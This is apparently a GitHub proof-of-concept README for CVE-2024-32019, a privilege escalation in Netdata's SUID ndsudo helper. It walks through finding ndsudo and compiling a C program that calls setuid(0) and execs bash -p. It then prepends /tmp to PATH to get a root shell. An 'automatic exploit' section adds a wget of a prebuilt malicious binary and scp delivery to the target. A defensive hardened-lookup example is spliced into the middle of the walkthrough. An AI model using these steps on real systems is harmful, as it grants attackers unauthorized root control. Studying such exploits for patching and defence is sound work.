Associated Vulnerability
Title: ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description: Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
Netdata ndsudo local privilege escalation workflow and POC (CVE-2024-32019)
Readme
# CVE-2024-32019-POC
Netdata ndsudo local privilege escalation workflow and POC (CVE-2024-32019)
- [Workflow](#workflow)
- [Automatic exploit](#automatic-exploit)
- [Resources](#resources)
## Workflow
> [!TIP]
> Please read
Netdata is a tool that provides application and system monitoring. It listens on port 19999, which makes it easy to find:
```shell
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:19999 0.0.0.0:* LISTEN
```
This vulnerability (CVE-2024-32019) **affects** the following versions: `>= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169`. We can send a request to the agent and read the version from the response header:
<img width="605" height="289" alt="CVE-2024-32019-1" src="https://github.com/user-attachments/assets/121b7527-1c0b-4564-abd9-1b663bfe94f8" />
The exploit works by leveraging **PATH hijacking** against one of its plugins, `ndsudo`, which is often located in `/opt/netdata/usr/libexec/netdata/` and which has the SUID bit set.
```shell
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```
<img width="1064" height="51" alt="CVE-2024-32019-2" src="https://github.com/user-attachments/assets/3bfa95c7-614c-48a9-b95f-267ebf26475c" />
We can see what it allows us to do using `--help`:
```shell
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
--test
print the generated command that will be run, without running it.
--help
print this message.
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : nvme-smart-log
Executables: nvme
Parameters : smart-log {{device}} --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
- Command : megacli-battery-info
Executables: megacli MegaCli
Parameters : -AdpBbuCmd -aAll -NoLog
- Command : arcconf-ld-info
Executables: arcconf
Parameters : GETCONFIG 1 LD
- Command : arcconf-pd-info
Executables: arcconf
Parameters : GETCONFIG 1 PD
The program searches for executables in the system path.
Variables given as {{variable}} are expected on the command line as:
--variable VALUE
VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
```
```shell
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.
```
As we can see, each supported command looks up an executable by name, so we can create our own executable with one of those names and place it in a directory that we add to the `PATH` environment variable.
Netdata uses `C`; consequently, we write our program in C and compile it.
<img width="1127" height="1157" alt="CVE-2024-32019" src="https://github.com/user-attachments/assets/5b9ca43a-3bf4-4158-ae04-956acbce4660" />
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);
    perror("execl");
    return 1;
}
```
```shell
gcc arcconf.c -o arcconf
```
Then, as previously discussed, we add the directory containing our executable to `$PATH`:
```shell
test@test:/tmp$ PATH=/tmp:$PATH
```
Finally, we simply run the command that points to our malicious executable (`arcconf-pd-info -> arcconf`), and it gives us a privileged shell:
```shell
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root
```
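The root cause in this workflow is that a SUID helper resolves command names through the caller's `PATH`. The following is an added example of a hardened lookup, not code from this repository and not Netdata's actual patch: it ignores `PATH`, searches a fixed directory list, and rejects any directory or file that is not owned by the trusted user or is writable by group or others. The names `TRUSTED_DIRS`, `owned_and_locked` and `resolve_trusted`, and the directory list itself, are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed fixed search list, compiled in; getenv("PATH") is never consulted. */
static const char *const TRUSTED_DIRS[] = {"/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL};

/* True if path has the wanted type, belongs to `owner`, cannot be modified
 * by group or other users, and (for files) is executable by its owner. */
static int owned_and_locked(const char *path, uid_t owner, int want_dir) {
    struct stat st;
    if (stat(path, &st) != 0) return 0;
    if (want_dir ? !S_ISDIR(st.st_mode) : !S_ISREG(st.st_mode)) return 0;
    if (!want_dir && !(st.st_mode & S_IXUSR)) return 0;
    return st.st_uid == owner && (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Resolve a bare command name against `dirs` only. Returns 0 and writes the
 * absolute path to `out`, or -1 if no acceptable candidate exists. */
int resolve_trusted(const char *name, const char *const *dirs, uid_t owner,
                    char *out, size_t outlen) {
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;                          /* bare names only, no paths */
    for (size_t i = 0; dirs[i] != NULL; i++) {
        if (!owned_and_locked(dirs[i], owner, 1)) continue;  /* untrusted dir */
        int n = snprintf(out, outlen, "%s/%s", dirs[i], name);
        if (n < 0 || (size_t)n >= outlen) continue;          /* path too long */
        if (owned_and_locked(out, owner, 0)) return 0;
    }
    return -1;
}

int main(int argc, char **argv) {
    char path[4096];
    const char *name = argc > 1 ? argv[1] : "arcconf";
    /* A SUID-root helper would require owner 0 for every directory and file. */
    if (resolve_trusted(name, TRUSTED_DIRS, 0, path, sizeof path) != 0) {
        fprintf(stderr, "%s: not found in trusted directories\n", name);
        return 1;
    }
    printf("%s\n", path);  /* a helper would pass this absolute path to execv() */
    return 0;
}
```

Because the resolved path is absolute and every component checked is writable only by the trusted owner, changing `PATH` in the calling shell has no effect on which binary is selected.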
## Automatic exploit
You can download the already compiled malicious C program, which gives you a bash shell as root as described in the example above:
```shell
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf
```
```shell
mv arcconf /tmp #If your target has Internet connectivity
scp ./arcconf test@test:/tmp/arcconf #If your target does not have Internet connectivity
```
```shell
PATH=/tmp:$PATH
```
```shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info #The ndsudo path may change
```
## Resources
- https://learn.netdata.cloud/docs/collecting-metrics/
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
- https://app.hackthebox.com/machines/684
File Snapshot
[4.0K] /data/pocs/f045e1879a0473dd4c8b3eb4502a450f08259470
├── [ 15K] arcconf
├── [400K] CVE-2024-32019.pdf
└── [4.3K] README.md
0 directories, 3 files